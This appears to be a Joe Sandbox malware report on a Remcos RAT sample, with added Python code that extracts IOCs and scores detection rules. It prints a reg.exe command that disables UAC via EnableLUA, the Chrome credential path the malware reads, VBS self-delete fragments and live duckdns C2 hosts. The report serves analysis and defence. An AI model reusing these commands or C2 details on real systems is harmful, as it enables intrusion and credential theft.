
Windows Analysis Report
17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe

Overview

General Information

Sample name: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
Analysis ID: 1535239
MD5: 3904babb53d5bbdab7e0785a533a58d7
SHA1: ce1f658c4fec558cd65698c766363f06c876bdbd
SHA256: 73710268628b6e68182c360fb53dc6475b31dacd9f46d05e98c0830019b075aa
Tags: base64-decoded, exe, user-abuse_ch

Detection

Family: Remcos
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for sample
Uses dynamic DNS services
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Extracted malware configuration: {"Host:Port:Password": "embargogo237.duckdns.org:10521:1embargogo2377.duckdns.org:10522:0", "Assigned name": "COSTAUD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "hhh-AQVE0Z", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
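The configuration above is what the extractor recovered, but a responder wants it as a queryable IOC set: the C2 hosts and ports, the mutex, the keylog drop path and the Run-key persistence the config enables. The Python below is an added example written for this page; it is not Joe Sandbox's extractor and not Remcos code. It assumes Remcos separates C2 entries with the 0x1e record-separator byte (older builds used "|"); the report has lost that separator and prints the two entries run together, so the code also carries a fallback that re-splits the string at each ":<port>:<one-digit flag>" boundary, which is only safe because both entries here end in a single digit. APP_PATH_OBSERVED is taken from the report's file-create event (C:\ProgramData\remcos\logs.dat), since the config itself only says "Application path"; the field label "Host:Port:Password" is the report's, and the third field is treated here as an opaque flag.

```python
"""Turn the Remcos configuration extracted in this report into a hunting IOC set.

Added example, not Joe Sandbox's extractor. Assumes Remcos delimits C2 entries
with 0x1e (or '|' in older builds) and falls back to re-splitting a run-together
list at each ':<port>:<single-digit flag>' boundary when no delimiter survived."""
import re

# Values copied from the report's extracted configuration.
REPORT_CONFIG = {
    "Host:Port:Password": "embargogo237.duckdns.org:10521:1embargogo2377.duckdns.org:10522:0",
    "Assigned name": "COSTAUD", "Connect interval": "1", "Install flag": "Disable",
    "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable",
    "Install path": "Application path", "Copy file": "remcos.exe",
    "Startup value": "Disable", "Hide file": "Disable", "Mutex": "hhh-AQVE0Z",
    "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat",
    "Keylog crypt": "Disable", "Hide keylog file": "Disable",
    "Screenshot flag": "Disable", "Screenshot time": "10",
    "Take Screenshot option": "Disable", "Take screenshot title": "",
    "Take screenshot time": "5", "Screenshot path": "AppData",
    "Screenshot file": "Screenshots", "Screenshot crypt": "Disable",
    "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5",
}

# Directory the report's Sysmon file-create event shows the keylog landing in,
# i.e. what "Application path" resolved to in the sandbox run.
APP_PATH_OBSERVED = r"C:\ProgramData\remcos"

ENTRY_SEPARATORS = ("\x1e", "|")            # assumed Remcos delimiters
RUN_KEY = r"\Software\Microsoft\Windows\CurrentVersion\Run"
# Fallback for a run-together list: a host cannot contain ':' and the trailing
# field is a single digit in this sample.
_FALLBACK = re.compile(r"([^:\s]+):(\d{1,5}):(\d)")


def parse_c2(field: str) -> list[tuple[str, int, str]]:
    """Return [(host, port, flag)] from the 'Host:Port:Password' field."""
    for sep in ENTRY_SEPARATORS:
        if sep in field:
            entries = []
            for part in filter(None, field.split(sep)):
                host, port, flag = part.rsplit(":", 2)
                entries.append((host, int(port), flag))
            return entries
    return [(h, int(p), f) for h, p, f in _FALLBACK.findall(field)]


def defang(host: str) -> str:
    """Make a hostname safe to paste into tickets and chat."""
    return host.replace(".", "[.]")


def build_iocs(cfg: dict) -> dict:
    """Collect the indicators a hunter would query for from the config."""
    c2 = parse_c2(cfg["Host:Port:Password"])
    run_keys = [hive + RUN_KEY
                for hive, key in (("HKCU", "Setup HKCU\\Run"), ("HKLM", "Setup HKLM\\Run"))
                if cfg.get(key) == "Enable"]
    keylog = cfg["Keylog file"] if cfg.get("Keylog flag") == "1" else None
    install = cfg["Copy file"] if cfg.get("Install flag") == "Enable" else None
    return {
        "c2_entries": c2,
        "c2_hosts": sorted({h for h, _, _ in c2}),
        "c2_ports": sorted({p for _, p, _ in c2}),
        "dynamic_dns_hosts": sorted({h for h, _, _ in c2 if h.endswith(".duckdns.org")}),
        "mutex": cfg["Mutex"],
        "install_path": APP_PATH_OBSERVED + "\\" + install if install else None,
        "keylog_file": APP_PATH_OBSERVED + "\\" + keylog if keylog else None,
        "persistence_run_keys": run_keys,
        "screenshots_enabled": cfg.get("Screenshot flag") == "Enable",
    }


if __name__ == "__main__":
    iocs = build_iocs(REPORT_CONFIG)
    for host, port, flag in iocs["c2_entries"]:
        print(f"C2 {defang(host)}:{port} (flag {flag})")
    for key, value in iocs.items():
        if key != "c2_entries":
            print(f"{key:22} {value}")
```

Note that "Install flag" is Disable here, which matches the report: the sample keeps running from the Desktop (PID 1516) rather than copying itself to remcos.exe, while the keylog still lands under C:\ProgramData\remcos. The fallback splitter would mis-split an IP-based host list where the flag digit runs straight into the next address's first octet, so treat its output as a hint to go back to the raw config bytes whenever the separator is missing.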
Yara matches on the submitted sample

Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
  • Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
  • Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
  • Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
  • Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Matched strings:
      • 0x6aab8:$a1: Remcos restarted by watchdog!
      • 0x6b030:$a3: %02i:%02i:%02i:%03i
  • Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Matched strings:
      • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x64b7c:$str_b2: Executing file:
      • 0x65bfc:$str_b3: GetDirectListeningPort
      • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x65728:$str_b7: \update.vbs
      • 0x64ba4:$str_b9: Downloaded file:
      • 0x64b90:$str_b10: Downloading file:
      • 0x64c34:$str_b12: Failed to upload file:
      • 0x65bc4:$str_b13: StartForward
      • 0x65be4:$str_b14: StopForward
      • 0x65680:$str_b15: fso.DeleteFile "
      • 0x65614:$str_b16: On Error Resume Next
      • 0x656b0:$str_b17: fso.DeleteFolder "
      • 0x64c24:$str_b18: Uploaded file:
      • 0x64be4:$str_b19: Unable to delete:
      • 0x65648:$str_b20: while fso.FileExists("
      • 0x650c1:$str_c0: [Firefox StoredLogins not found]
Yara matches on dropped files

Source: C:\ProgramData\remcos\logs.dat
  • Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Yara matches on memory dumps

Source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp
  • Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp
  • Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp
  • Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
  • Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
  • Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Yara matches on unpacked PEs

Source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack
  • Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
  • Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
  • Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
  • Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Matched strings:
      • 0x6aab8:$a1: Remcos restarted by watchdog!
      • 0x6b030:$a3: %02i:%02i:%02i:%03i
  • Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Matched strings:
      • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x64b7c:$str_b2: Executing file:
      • 0x65bfc:$str_b3: GetDirectListeningPort
      • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x65728:$str_b7: \update.vbs
      • 0x64ba4:$str_b9: Downloaded file:
      • 0x64b90:$str_b10: Downloading file:
      • 0x64c34:$str_b12: Failed to upload file:
      • 0x65bc4:$str_b13: StartForward
      • 0x65be4:$str_b14: StopForward
      • 0x65680:$str_b15: fso.DeleteFile "
      • 0x65614:$str_b16: On Error Resume Next
      • 0x656b0:$str_b17: fso.DeleteFolder "
      • 0x64c24:$str_b18: Uploaded file:
      • 0x64be4:$str_b19: Unable to delete:
      • 0x65648:$str_b20: while fso.FileExists("
      • 0x650c1:$str_c0: [Firefox StoredLogins not found]

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, ProcessId: 1516, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2024-10-16T18:50:18.157431+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5:49720 | 94.103.125.196:10521 | TCP
2024-10-16T18:50:20.385265+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.5:49725 | 178.237.33.50:80 | TCP

AV Detection

Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Avira: detected
Source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "embargogo237.duckdns.org:10521:1embargogo2377.duckdns.org:10522:0", "Assigned name": "COSTAUD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "hhh-AQVE0Z", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | ReversingLabs: Detection: 84%
Source: Yara match | File source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_004338C8: CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_4bad6d9d-0

Exploits

Source: Yara match | File source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_00407538: _wcslen, CoGetObject
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0040928E: __EH_prolog, __CxxThrowException@8, FindFirstFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0041C322: FindFirstFileW, FindNextFileW, RemoveDirectoryW, SetFileAttributesW, DeleteFileW, GetLastError, FindClose, RemoveDirectoryW, FindClose
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0040C388: FindFirstFileW, PathFileExistsW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_004096A0: __EH_prolog, FindFirstFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_00408847: __EH_prolog, FindFirstFileW, __CxxThrowException@8, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_00407877: FindFirstFileW, FindNextFileW
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0044E8F9: FindFirstFileExA
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0040BB6B: FindFirstFileA, FindClose, DeleteFileA, GetLastError, DeleteFileA, GetLastError, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_00419B86: FindFirstFileW, FindNextFileW, FindNextFileW
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0040BD72: FindFirstFileA, FindClose, DeleteFileA, GetLastError, FindNextFileA, FindClose, FindClose
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_00407CD2: SetEvent, GetFileAttributesW, DeleteFileW, ShellExecuteW, GetLogicalDriveStringsA, SetFileAttributesW, DeleteFileA, Sleep, StrToIntA, CreateDirectoryW

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49720 -> 94.103.125.196:10521
Source: Malware configuration extractor | URLs: embargogo237.duckdns.org
Source: unknown | DNS query: name: embargogo237.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.5:49720 -> 94.103.125.196:10521
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1, Host: geoplugin.net, Cache-Control: no-cache (no User-Agent header)
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: KWAOOK-NETSARLFR
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49725 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function 0_2_0041B411: InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle
Source: global traffic | DNS traffic detected: DNS query: embargogo237.duckdns.org
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.000000000061F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp%
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp6
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpU_
Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.00000000005F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpX
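The evidence in this report arrives from several telemetry sources at once: a Sysmon file-create event for C:\ProgramData\remcos\logs.dat, a DNS lookup of a duckdns.org name, a TCP session from the sandbox host to port 10521, an HTTP GET to geoplugin.net/json.gp that carries no User-Agent header, and the embedded reg.exe command that writes EnableLUA under Policies\System. The Python below is an added example, not a Joe Sandbox signature or Sigma rule, that encodes those observations as small predicates and runs them over constructed event records (not real logs: the sample image name is shortened to sample.exe, the reg.exe command line is completed past the report's truncated "REG_DWOR", and three benign control events are included). The rule weights and the 100-point cap are my choice, loosely echoing the report's score range.

```python
"""Triage rules for the behaviours this report records, run over constructed telemetry.

Added example; not a Joe Sandbox signature. The event records are made up to
mirror the report's observations, plus benign controls that must not fire."""
import ipaddress

# Constructed events (not real logs). Paths, names, ports and addresses follow
# the report; the reg.exe command line is completed past the report's truncated
# 'REG_DWOR' and the sample image name is shortened.
EVENTS = [
    {"type": "file_create", "image": r"C:\Users\user\Desktop\sample.exe",
     "target": r"C:\ProgramData\remcos\logs.dat"},
    {"type": "dns", "query": "embargogo237.duckdns.org"},
    {"type": "flow", "src": "192.168.2.5", "dst": "94.103.125.196",
     "dport": 10521, "proto": "tcp"},
    {"type": "http", "method": "GET", "host": "geoplugin.net", "uri": "/json.gp",
     "headers": {"Cache-Control": "no-cache"}},
    {"type": "process_create", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft"
                r"\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    # Benign controls.
    {"type": "http", "method": "GET", "host": "example.org", "uri": "/",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"type": "flow", "src": "192.168.2.5", "dst": "93.184.216.34",
     "dport": 443, "proto": "tcp"},
    {"type": "file_create", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\notes.txt"},
]

DDNS_SUFFIXES = (".duckdns.org",)   # extend with the dynamic-DNS providers you track
COMMON_PORTS = {25, 53, 80, 443, 587, 993, 995, 8080}


def _is_public(ip: str) -> bool:
    return ipaddress.ip_address(ip).is_global


def rule_keylog_drop(e: dict) -> bool:
    # Remcos writes its keylog as logs.dat inside its install directory.
    t = e.get("target", "").lower()
    return e["type"] == "file_create" and "\\remcos\\" in t and t.endswith("\\logs.dat")


def rule_ddns_query(e: dict) -> bool:
    return e["type"] == "dns" and e["query"].lower().endswith(DDNS_SUFFIXES)


def rule_nonstd_port(e: dict) -> bool:
    # Internal host talking to a public address on a port outside the usual set.
    return (e["type"] == "flow" and not _is_public(e["src"]) and _is_public(e["dst"])
            and e["dport"] not in COMMON_PORTS)


def rule_http_no_ua(e: dict) -> bool:
    return e["type"] == "http" and not any(k.lower() == "user-agent" for k in e["headers"])


def rule_geoplugin(e: dict) -> bool:
    # Geolocation lookup the sample performs alongside its C2 traffic.
    return (e["type"] == "http" and e["host"].lower() == "geoplugin.net"
            and e["uri"].startswith("/json.gp"))


def rule_enablelua(e: dict) -> bool:
    # reg.exe writing Policies\System\EnableLUA, the string the Yara hit exposes.
    c = e.get("cmdline", "").lower()
    return e["type"] == "process_create" and "reg" in c and "enablelua" in c


RULES = {                       # name: (predicate, weight); weights are my choice
    "remcos_keylog_file_created": (rule_keylog_drop, 40),
    "uac_enablelua_modified": (rule_enablelua, 30),
    "dynamic_dns_lookup": (rule_ddns_query, 20),
    "geoplugin_geolocation_check": (rule_geoplugin, 15),
    "http_without_user_agent": (rule_http_no_ua, 10),
    "outbound_nonstandard_port": (rule_nonstd_port, 10),
}


def triage(events: list) -> list:
    """Return [(rule_name, event_index)] for every rule that fires on any event."""
    return [(name, i) for i, e in enumerate(events)
            for name, (pred, _) in RULES.items() if pred(e)]


def score(hits: list) -> int:
    """Add each distinct rule's weight once, capped at 100 like the report's range."""
    return min(100, sum(RULES[name][1] for name in {n for n, _ in hits}))


if __name__ == "__main__":
    hits = triage(EVENTS)
    for name, i in hits:
        print(f"{name:30} event#{i} {EVENTS[i]}")
    print("score:", score(hits))
```

The geoplugin request trips two rules at once (no User-Agent, and the geolocation endpoint itself), which is the point of scoring per distinct rule rather than per event: one noisy request should not outweigh the keylog drop or the EnableLUA write. The non-standard-port rule is deliberately weak on its own and only becomes interesting next to the dynamic-DNS lookup that resolved the destination.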

